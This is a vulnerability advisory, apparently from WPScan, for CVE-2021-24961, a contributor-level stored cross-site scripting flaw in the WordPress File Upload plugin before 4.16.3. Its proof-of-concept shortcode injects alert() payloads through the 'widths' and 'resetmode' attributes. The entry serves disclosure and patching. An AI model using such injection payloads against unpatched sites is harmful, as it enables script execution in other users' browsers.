WordPress File Upload < 4.16.3 – Contributor+ Stored Cross-Site Scripting via Shortcode | CVE 2021-24961 | Plugin Vulnerabilities

Description

The plugin does not escape some of its shortcode argument, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks

Proof of Concept

[wordpress_file_upload widths='title:1;animation-name&amp;colon;twentytwentyone-close-button-transition" onanimationend="alert(/XSS-widths/)' resetmode='"+alert(/XSS-restmode/)&amp;&amp;"']

Affects Plugins

Fixed in 4.16.3

wordpress-file-upload-pro

Fixed in 4.16.3

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2677722

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

c911bbbd-0196-4e3d-ada3-4efb8a339954

Timeline

Publicly Published

2022-02-14 (about 3 years ago)

Added

2022-02-14 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2025-06-27

Title

HT Mega – Absolute Addons for WPBakery Page Builder < 1.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-04-25

Title

ColorNews < 1.2.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-03-26

Title

Simple Ajax Chat < 20240223 - Unauthenticated Stored Cross-Site Scripting

Published

2024-12-12

Title

3D Avatar User Profile <= 1.0.0 - Reflected Cross-Site Scripting

Published

2025-07-28

Title

Supermalink <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting